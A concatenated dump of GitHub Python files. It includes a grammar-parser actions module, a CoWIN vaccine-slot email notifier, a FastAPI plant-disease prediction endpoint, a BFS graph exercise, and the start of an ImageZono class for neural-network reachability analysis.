o.vars.extend(ff.vars)\n o.node = TryCatchFinally(b, c, f)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_throw(cls, context, loc, ee, em):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ee)\n if em:\n cls.checknode(context, loc, em)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n if em:\n o.node = MacroNode(Throw, ee.value_expr(), em.value_expr())\n else:\n o.node = MacroNode(Rethrow, ee.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n if em:\n o.node = Throw(ee.value_expr(), em.value_expr())\n else:\n o.node = Rethrow(ee.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ee.code)\n o.vars.extend(ee.vars)\n if em:\n o.code.extend(em.code)\n o.vars.extend(em.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n#-class\n\nclass GlapParserActions(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'inmacro', 'procedure_nesting_level', 'actions' ]\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n\n context.actions = self\n self.context = context\n self.inmacro = False\n self.procedure_nesting_level = 0\n self.actions = {\n 'start': self.on_start,\n 'module': self.on_module,\n 'grammar': self.on_grammar,\n 'rule': self.on_rule,\n 'rule_rhs_expr(_|_)': self.on_rule_rhs_expr_alt,\n 'rule_rhs_expr(_-_)': self.on_rule_rhs_expr_sub,\n 'rule_rhs_expr(_ _)': self.on_rule_rhs_expr_cat,\n 'rule_rhs_expr(_*)': self.on_rule_rhs_expr_star,\n 'rule_rhs_expr(_+)': self.on_rule_rhs_expr_plus,\n 'rule_rhs_expr(_?)': self.on_rule_rhs_expr_opt,\n 'rule_rhs_expr(-_)': self.on_rule_rhs_expr_neg,\n 'rule_rhs_expr(~_)': self.on_rule_rhs_expr_inv,\n 'rule_rhs_expr(_\\'_)': self.on_rule_rhs_expr_label,\n 'rule_rhs_expr_atom(ID)': self.on_rule_rhs_expr_atom_var,\n 'rule_rhs_expr_atom(STR)': self.on_rule_rhs_expr_atom_str,\n 'rule_rhs_expr_atom(STR..STR)': self.on_rule_rhs_expr_atom_range,\n 'rule_rhs_expr_atom(eps)': self.on_rule_rhs_expr_atom_epsilon,\n 'rule_rhs_expr_atom(action)': self.on_rule_rhs_expr_atom_action,\n 'c_expr(_=_)': (lambda *args:\n GlapCompileCmdHelper.make_assign(*args)\n ),\n 'c_expr(_+=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Add)\n ),\n 'c_expr(_-=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Sub)\n ),\n 'c_expr(_*=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mul)\n ),\n 'c_expr(_/=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Div)\n ),\n 'c_expr(_%=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mod)\n ),\n 'c_expr(_&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitAnd)\n ),\n 'c_expr(_|=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitOr)\n ),\n 'c_expr(_^=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftR)\n ),\n 'c_expr(_&&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, And)\n ),\n 'c_expr(_||=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Or)\n ),\n 'c_expr(_.=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Concat)\n ),\n 'c_expr(_++=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Join)\n ),\n 'c_expr(_~~=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Merge)\n ),\n 'c_expr(_||_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Or)\n ),\n 'c_expr(_&&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, And)\n ),\n 'c_expr(_<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Lt)\n ),\n 'c_expr(_>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Gt)\n ),\n 'c_expr(_<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Le)\n ),\n 'c_expr(_>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ge)\n ),\n 'c_expr(_==_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Eq)\n ),\n 'c_expr(_!=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ne)\n ),\n 'c_expr(_===_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Is)\n ),\n 'c_expr(_in_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Contains)\n ),\n 'c_expr(_|_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitOr)\n ),\n 'c_expr(_&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitAnd)\n ),\n 'c_expr(_^_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftR)\n ),\n 'c_expr(_+_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Add)\n ),\n 'c_expr(_-_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Sub)\n ),\n 'c_expr(_._)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Concat)\n ),\n 'c_expr(_++_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Join)\n ),\n 'c_expr(_~~_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Merge)\n ),\n 'c_expr(_*_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mul)\n ),\n 'c_expr(_/_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Div)\n ),\n 'c_expr(_%_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mod)\n ),\n 'c_expr(_ _)': (lambda *args:\n GlapCompileCmdHelper.make_call(*args)\n ),\n 'c_expr(-_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Neg)\n ),\n 'c_expr(!_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Not)\n ),\n 'c_expr(~_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Inv)\n ),\n 'c_expr(_[_])': (lambda *args:\n GlapCompileCmdHelper.make_index(*args)\n ),\n 'c_expr(_:ID)': (lambda *args:\n GlapCompileCmdHelper.make_access(*args)\n ),\n 'c_expr_atom(ID)': (lambda *args:\n GlapCompileCmdHelper.make_variable(*args)\n ),\n 'c_expr_atom($ID)': (lambda *args:\n GlapCompileCmdHelper.make_getvalue(*args)\n ),\n 'c_expr_atom(#ID)': (lambda *args:\n GlapCompileCmdHelper.make_macroparam(*args)\n ),\n 'c_expr_atom($(_ _))': (lambda *args:\n GlapCompileCmdHelper.make_expand(*args)\n ),\n 'c_expr_atom(INT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(FLOAT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(STR)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(pair)': (lambda *args:\n GlapCompileCmdHelper.make_pair(*args)\n ),\n 'c_expr_atom(list)': (lambda *args:\n GlapCompileCmdHelper.make_list(*args)\n ),\n 'c_expr_atom(hash)': (lambda *args:\n GlapCompileCmdHelper.make_hash(*args)\n ),\n 'c_expr_atom(lambda)': (lambda *args:\n GlapCompileCmdHelper.make_lambda(*args)\n ),\n 'c_stmt(block)': (lambda *args:\n GlapCompileCmdHelper.make_block(*args)\n ),\n 'c_stmt(defmacro)': (lambda *args:\n GlapCompileCmdHelper.make_defmacro(*args)\n ),\n 'c_stmt(define)': (lambda *args:\n GlapCompileCmdHelper.make_define(*args)\n ),\n 'c_stmt(if)': (lambda *args:\n GlapCompileCmdHelper.make_if(*args)\n ),\n 'c_stmt(foreach)': (lambda *args:\n GlapCompileCmdHelper.make_foreach(*args)\n ),\n 'c_stmt(while)': (lambda *args:\n GlapCompileCmdHelper.make_while(*args)\n ),\n 'c_stmt(do-while)': (lambda *args:\n GlapCompileCmdHelper.make_dowhile(*args)\n ),\n 'c_stmt(break)': (lambda *args:\n GlapCompileCmdHelper.make_break(*args)\n ),\n 'c_stmt(continue)': (lambda *args:\n GlapCompileCmdHelper.make_continue(*args)\n ),\n 'c_stmt(return)': (lambda *args:\n GlapCompileCmdHelper.make_return(*args)\n ),\n 'c_stmt(return(expr))': (lambda *args:\n GlapCompileCmdHelper.make_return_with_value(*args)\n ),\n 'c_stmt(try)': (lambda *args:\n GlapCompileCmdHelper.make_try(*args)\n ),\n 'c_stmt(throw)': (lambda *args:\n GlapCompileCmdHelper.make_throw(*args)\n ),\n 'a_stmt(block)': (lambda *args: mn_(ABlock, *args)),\n 'a_stmt(expr)': (lambda ctx, loc, e: e),\n 'a_stmt(_=_)': (lambda *args: mn_(AAssign, *args)),\n 'a_stmt(_+=_)': (lambda *args: mn_(AInplaceAdd, *args)),\n 'a_stmt(_-=_)': (lambda *args: mn_(AInplaceSub, *args)),\n 'a_stmt(_*=_)': (lambda *args: mn_(AInplaceMul, *args)),\n 'a_stmt(_/=_)': (lambda *args: mn_(AInplaceDiv, *args)),\n 'a_stmt(_%=_)': (lambda *args: mn_(AInplaceMod, *args)),\n 'a_stmt(_&=_)': (lambda *args: mn_(AInplaceBitAnd, *args)),\n 'a_stmt(_|=_)': (lambda *args: mn_(AInplaceBitOr, *args)),\n 'a_stmt(_^=_)': (lambda *args: mn_(AInplaceBitXor, *args)),\n 'a_stmt(_<<=_)': (lambda *args: mn_(AInplaceShiftLeft, *args)),\n 'a_stmt(_>>=_)': (lambda *args: mn_(AInplaceShiftRight, *args)),\n 'a_stmt(if)': (lambda *args: mn_(AIf, *args)),\n 'a_stmt(case)': (lambda *args: mn_(ACase, *args)),\n 'a_stmt(for)': (lambda ctx, loc, v, e, b:\n AFor(\n AId(v.value()).set_location(\n *make_location(ctx, v.position())\n ),\n e, b\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_stmt(while)': (lambda *args: mn_(AWhile, *args)),\n 'a_stmt(do-while)': (lambda *args: mn_(ADoWhile, *args)),\n 'a_stmt(break)': (lambda *args: mn_(ABreak, *args)),\n 'a_stmt(continue)': (lambda *args: mn_(AContinue, *args)),\n 'a_stmt(return)': (lambda *args: mn_(AReturn, *args)),\n 'a_stmt(return(expr))': (lambda *args: mn_(AReturnWithValue, *args)),\n 'a_expr(_||_)': (lambda *args: mn_(ALogOrExpr, *args)),\n 'a_expr(_&&_)': (lambda *args: mn_(ALogAndExpr, *args)),\n 'a_expr(_<_)': (lambda *args: mn_(ALtExpr, *args)),\n 'a_expr(_>_)': (lambda *args: mn_(AGtExpr, *args)),\n 'a_expr(_<=_)': (lambda *args: mn_(ALeExpr, *args)),\n 'a_expr(_>=_)': (lambda *args: mn_(AGeExpr, *args)),\n 'a_expr(_==_)': (lambda *args: mn_(AEqExpr, *args)),\n 'a_expr(_!=_)': (lambda *args: mn_(ANotEqExpr, *args)),\n 'a_expr(_|_)': (lambda *args: mn_(ABitOrExpr, *args)),\n 'a_expr(_&_)': (lambda *args: mn_(ABitAndExpr, *args)),\n 'a_expr(_^_)': (lambda *args: mn_(ABitXorExpr, *args)),\n 'a_expr(_<<_)': (lambda *args: mn_(AShiftLeftExpr, *args)),\n 'a_expr(_>>_)': (lambda *args: mn_(AShiftRightExpr, *args)),\n 'a_expr(_+_)': (lambda *args: mn_(AAddExpr, *args)),\n 'a_expr(_-_)': (lambda *args: mn_(ASubExpr, *args)),\n 'a_expr(_*_)': (lambda *args: mn_(AMulExpr, *args)),\n 'a_expr(_/_)': (lambda *args: mn_(ADivExpr, *args)),\n 'a_expr(_%_)': (lambda *args: mn_(AModExpr, *args)),\n 'a_expr(-_)': (lambda *args: mn_(ANegExpr, *args)),\n 'a_expr(~_)': (lambda *args: mn_(AInvExpr, *args)),\n 'a_expr(!_)': (lambda *args: mn_(ANotExpr, *args)),\n 'a_expr(_(_))': (lambda *args: mn_(ACallExpr, *args)),\n 'a_expr(_[_])': (lambda *args: mn_(AIndexExpr, *args)),\n 'a_expr(_.ID)': (lambda ctx, loc, lhs, rhs:\n AAccessExpr(\n lhs,\n AId(rhs.value()).set_location(\n *make_location(ctx, rhs.position())\n )\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_expr_atom(ID)': (lambda *args: mn_(AId, *args)),\n 'a_expr_atom(INT)': (lambda *args: mn_(AIntLiteral, *args)),\n 'a_expr_atom(FLOAT)': (lambda *args: mn_(AFloatLiteral, *args)),\n 'a_expr_atom(STR)': (lambda *args: mn_(AStringLiteral, *args)),\n 'unwrap': self.on_unwrap\n }\n #-def\n\n def on_start(self, context, module):\n \"\"\"\n \"\"\"\n\n return module\n #-def\n\n def on_module(self, context, loc, name, module_units):\n \"\"\"\n \"\"\"\n\n node = DefModule(name.value(), module_units)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_grammar(\n self, context, loc, name, grammar_type_spec, rules_and_commands\n ):\n \"\"\"\n \"\"\"\n\n node = DefGrammar(\n name.value(),\n [\n (x.value(), Location(*make_location(context, x.position())))\n for x in grammar_type_spec\n ],\n rules_and_commands\n )\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule(self, context, lhs, leftarrow, rhs):\n \"\"\"\n \"\"\"\n\n node = DefRule(lhs.value(), rhs, leftarrow.value() == \":\")\n node.set_location(*make_location(context, lhs.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_alt(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs | rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_sub(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = SetMinus(lhs, rhs)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_cat(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs + rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_star(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['*']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_plus(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['+']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_opt(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['?']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_neg(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = -rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_inv(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = ~rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_label(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs % rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_var(self, context, t):\n \"\"\"\n \"\"\"\n\n node = Var(t.value())\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_str(self, context, t):\n \"\"\"\n \"\"\"\n\n v = t.value(True)\n if v == \"\":\n node = Epsilon()\n elif len(v) == 1:\n node = Sym(v)\n else:\n node = Literal(v)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_range(self, context, t, u):\n \"\"\"\n \"\"\"\n\n if len(t.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", t.position()\n )\n if len(u.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", u.position()\n )\n if ord(t.value()) > ord(u.value()):\n raise GlapSyntaxError(context,\n \"Invalid range literal (%r > %r)\" % (t.value(), u.value()),\n t.position()\n )\n a = Sym(t.value())\n a.set_location(*make_location(context, t.position()))\n b = Sym(u.value())\n b.set_location(*make_location(context, u.position()))\n node = Range(a, b)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_epsilon(self, context, loc):\n \"\"\"\n \"\"\"\n\n node = Epsilon()\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_action(self, context, loc, actions):\n \"\"\"\n \"\"\"\n\n l = make_location(context, loc)\n action = ABlock(actions)\n action.set_location(*l)\n node = Action(action)\n node.set_location(*l)\n return node\n #-def\n\n def on_unwrap(self, context, command):\n \"\"\"\n \"\"\"\n\n if self.inmacro:\n raise GlapSyntaxError(context, ie_(\"Unfinished macro definition\"))\n elif self.procedure_nesting_level != 0:\n raise GlapSyntaxError(\n context, ie_(\"Unfinished function definition\")\n )\n kind = command.kind\n if kind < 0:\n raise GlapSyntaxError(context, ie_(\"Unspecified node\"))\n elif kind <= GlapCompileCmdHelper.VARIABLE:\n unwrapped = []\n unwrapped.extend(command.code)\n if kind != GlapCompileCmdHelper.ASSIGN_EXPR:\n unwrapped.append(command.value_expr())\n return unwrapped\n elif kind <= GlapCompileCmdHelper.DEFINE_STATEMENT:\n return [command.value_expr()]\n raise GlapSyntaxError(context,\n ie_(\"Macro nodes was detected outside macro definition scope\")\n )\n #-def\n\n def run(self, action, context, *args):\n \"\"\"\n \"\"\"\n\n if action not in self.actions:\n raise ParsingError(\"Action %r does not exist\" % action)\n return self.actions[action](context, *args)\n #-def\n#-class\n\nclass GlapReader(Reader):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def read(self, source, *args, **opts):\n \"\"\"\n \"\"\"\n\n data, name = self.load_source(source, **opts)\n if data is None:\n return None\n ctx = GlapContext()\n GlapStream(ctx, name, data)\n GlapLexer(ctx)\n GlapParser(ctx)\n GlapActions(ctx)\n #-def\n#-class\n\ndef get_reader_class():\n \"\"\"\n \"\"\"\n\n return GlapReader\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/readers/glap/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":61796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28972148675","text":"import config\r\nimport time\r\nimport requests\r\nfrom datetime import date, timedelta\r\nimport smtplib\r\n\r\nuname = config.uname\r\nemail = config.email\r\ndistrict_id = str(config.district_id)\r\nvaccine_type = config.vaccine_type\r\nfee_type =config.fee_type\r\nage_limit = config.age_limit\r\nif age_limit < 45:\r\n age_limit = 18\r\nelse:\r\n age_limit = 45\r\n\r\nisUserNotified = config.isUserNotified\r\ndate_api = []\r\npayload = []\r\navailable_flag_break = config.available_flag_break\r\nattempt = config.attempt\r\nwait_time = config.wait_time\r\n\r\ndef sendmail(payload, email):\r\n def smtp(email, body):\r\n print(\"Sending mail to \" + email)\r\n SMTP_USER_NAME = config.SMTP_USER_NAME\r\n SMTP_PASSWORD = config.SMTP_PASSWORD\r\n SMTP_SERVER = config.SMTP_SERVER\r\n SMTP_PORT = config.SMTP_PORT\r\n TO = email\r\n TEXT = body\r\n SUBJECT = \"Automation Message for the COWIN Vaccine Notifier\"\r\n \r\n smtpserver = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\r\n smtpserver.ehlo()\r\n smtpserver.starttls()\r\n smtpserver.ehlo\r\n smtpserver.login(SMTP_USER_NAME, SMTP_PASSWORD)\r\n header = 'To:' + TO + '\\n' + 'From: ' + SMTP_USER_NAME\r\n header = header + '\\n' + 'Subject:' + SUBJECT + '\\n'\r\n msg = header + '\\n' + TEXT + '\\n\\n'\r\n smtpserver.sendmail(SMTP_USER_NAME, TO, msg)\r\n smtpserver.close()\r\n print(\"Email sent successfully to \" + email)\r\n\r\n def ulify(payload):\r\n string =\"Hi \"\r\n string += uname\r\n string += \"\\n\\nThis is the automation mail send from COWIN Vaccine Notifier\\n\\n\"\r\n string += \"\\n\".join([str(s) for s in payload])\r\n string += \"\\n\\nLink for COWIN Vacination Portal: https://www.cowin.gov.in \\nPS: Since your automation was successfully completed, the script was terminated.\\n\\nThank you for using COWIN Vaccine Notifier.\"\r\n return string\r\n \r\n body = ulify(payload)\r\n smtp(email, body)\r\n\r\nfor ba in range(attempt):\r\n date_api.append( (date.today()+timedelta(days=ba)).strftime(\"%d-%m-%Y\") ) \r\n\r\ndef main():\r\n global isUserNotified\r\n global available_flag_break\r\n\r\n while (isUserNotified == 0):\r\n for b in range(attempt):\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n exit\r\n\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n curl = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=\"+district_id+\"&date=\"+str(date_api[b])\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n x = requests.get(curl, headers = user_agent)\r\n data = x.json()\r\n vax = data['centers']\r\n for i in vax:\r\n for j in i['sessions']:\r\n if j['vaccine'] == vaccine_type and i['fee_type'] == fee_type and j['available_capacity'] > 0 and j['min_age_limit'] == age_limit and j['date'] == date_api[b]:\r\n count = j['available_capacity']\r\n name = i['name']\r\n date = j['date']\r\n p = \"There are \",count,\" \",vaccine_type,\" available in \",name,\" on \",date\r\n pp = ''.join(str(p) for p in p)\r\n print(p)\r\n payload.append(pp)\r\n isUserNotified = 1\r\n available_flag_break = 1\r\n break\r\n sendmail(payload, email) \r\n print(\"going to sleep for {} minutes.\".format(wait_time/60))\r\n time.sleep(wait_time)\r\n","repo_name":"guruhariharaun/CoWIN-Vaccine-Notifier","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"960713365","text":"from typing import Union\nimport uvicorn\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.middleware.cors import CORSMiddleware\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image\nimport tensorflow as tf\nimport requests\nfrom flask_cors import CORS\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# specify the correct endpoint\nendpoint = \"http://localhost:8504/v1/models/saved_model:predict\"\nCLASS_NAME = [\"early blight\", \"late blight\", \"healthy\"]\n\n@app.get(\"/ping\" )\nasync def ping():\n return \"pinging..\"\n\n\ndef readFileAsImage(data) ->np.ndarray:\n #convert the uploaded file to numpy array\n image = np.array(Image.open(BytesIO(data)))\n return image\n\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile = File(...)):\n image = readFileAsImage(await file.read())#await helps the system to handle multiple requests\n img_batch = np.expand_dims(image, 0)#remember the model takes a batch image as input but here we are provinding only one image. so we expand dimensions \n json_data = {\n \"instances\": img_batch.tolist()\n }\n response = requests.post(endpoint,json=json_data)\n prediction = np.array(response.json()[\"predictions\"][0])\n \n predicted_class = CLASS_NAME[np.argmax(prediction)]\n confidence = np.max(prediction)\n\n return {\n \"class\": predicted_class,\n \"confidence\": float(confidence)\n }\n\ndef application(environ, start_response):\n if environ['REQUEST_METHOD'] == 'OPTIONS':\n start_response(\n '200 OK',\n [\n ('Content-Type', 'application/json'),\n ('Access-Control-Allow-Origin', '*'),\n ('Access-Control-Allow-Headers', 'Authorization, Content-Type'),\n ('Access-Control-Allow-Methods', 'POST'),\n ]\n )\n return ''\n\nif __name__ == \"__main__\":\n uvicorn.run(app,host='localhost',port=8060)","repo_name":"NelsonMbogori/fastApi-MAchineLearning","sub_path":"maintfserving.py","file_name":"maintfserving.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36404104877","text":"# https://www.acmicpc.net/problem/18352\nimport sys\nfrom collections import deque\n\nn, m, k, x = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n + 1)]\ndistance = [-1] * (n + 1)\ndistance[x] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().split())\n graph[a].append(b)\n\nqueue = deque([x])\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if distance[i] == -1:\n queue.append(i)\n distance[i] = distance[v] + 1\n\ncheck = False\nfor i in range(1, n + 1):\n if distance[i] == k:\n print(i)\n check = True\n\nif check == False:\n print(-1)","repo_name":"graygreat/algorithm-study","sub_path":"BaekJoon/Searching/특정_거리의_도시_찾기_18352.py","file_name":"특정_거리의_도시_찾기_18352.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23046737677","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass ImageZono:\n # ImageZono class\n # Class for representing set of images using Zonotope\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageZono Set \n # author: Sung Woo Choi\n # date: 9/30/2021\n\n # 2-Dimensional ImageZono\n # ====================================================================%\n # Definition of 2-Dimensonal ImageZono\n # \n # A ImageZono Z= is defined by: \n # S = {x| x = c + a[1]*V[1] + a[2]*V[2] + ... + a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where -1 <= a[i] <= 1}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # The notion of 2D ImageZono is more general than the original Zonotope where\n # the V[0] and V[i] are vectors. \n # \n # Dimension of 2D ImageZono is the dimension of the center matrix V[0]\n # \n # ====================================================================%\n # The 2D representation of ImageZono is convenient for reachability analysis\n\n def __init__(obj, V = np.array([]), # an array of basis images \n lb_image = np.array([]), # lower bound of attack (high-dimensional array)\n ub_image = np.array([])): # upper bound of attack (high-dimensional array)\n from engine.set.star import Star\n from engine.set.zono import Zono\n\n if V.size:\n assert isinstance(V, np.ndarray), 'error: an array of basis images is not an ndarray'\n\n obj.V = V\n [obj.numChannels, obj.height, obj.width] = obj.V[0].shape\n obj.numPreds = obj.V.shape[0] - 1\n\n center = obj.V[1,:,:,:]\n generators = obj.V[1:obj.numPreds + 1, :,:,:]\n center = center.reshape(-1,1)\n generators = generators.reshape(-1, obj.numPreds)\n\n Z = Zono(center, generators)\n [lb, ub] = Z.getBounds()\n\n # A box representation of an ImageZono\n # A convenient way for user to specify the attack\n obj.lb_image = np.array(lb).reshape((obj.numChannels, obj.height, obj.width))\n obj.ub_image = np.array(ub).reshape((obj.numChannels, obj.height, obj.width))\n return\n\n\n if lb_image.size and ub_image.size:\n assert isinstance(lb_image, np.ndarray), 'error: a lower bound of attack is not an ndarray'\n assert isinstance(ub_image, np.ndarray), 'error: a upper bound of attack is not an ndarray'\n\n if lb_image.shape != ub_image.shape:\n raise Exception('error: different sizes between lower bound image and upper bound image')\n\n obj.lb_image = lb_image\n obj.ub_image = ub_image\n\n if len(lb_image.shape) == 3:\n obj.numChannels = obj.lb_image.shape[0] # number of channels, e.g., color images have 3 channel\n obj.height = obj.lb_image.shape[1] # height of image\n obj.width = obj.lb_image.shape[2] # width of image\n elif len(lb_image.shape) == 2:\n obj.numChannels = 1\n obj.height = obj.lb_image.shape[0]\n obj.width = obj.lb_image.shape[1]\n else:\n raise Exception('image bounds need to be a tuple of three elements: numChannels, image width, image height')\n lb = obj.lb_image.reshape(-1,1)\n ub = obj.ub_image.reshape(-1,1)\n\n S = Star(lb=lb, ub=ub)\n obj.numPreds = S.nVar # number of predicate variables\n obj.V = np.reshape(S.V, (obj.numPreds + 1, obj.numChannels, obj.height, obj.width))\n return\n \n raise Exception('error: failed to create ImageZono')\n\n#------------------check if this function is working--------------------------------------------\n # evaluate an ImageZono with specific values of predicates\n def evaluate(obj, pred_val = np.matrix([])):\n # @pred_val: valued vector of predicate variables\n\n assert obj.V.size, 'error: the ImageZono is an empty set'\n assert pred_val.size[1] == 1, 'error: invalid predicate vector'\n assert pred_val.size[0] == obj.numPreds, 'error: inconsistency between the size of the predicate vector and the 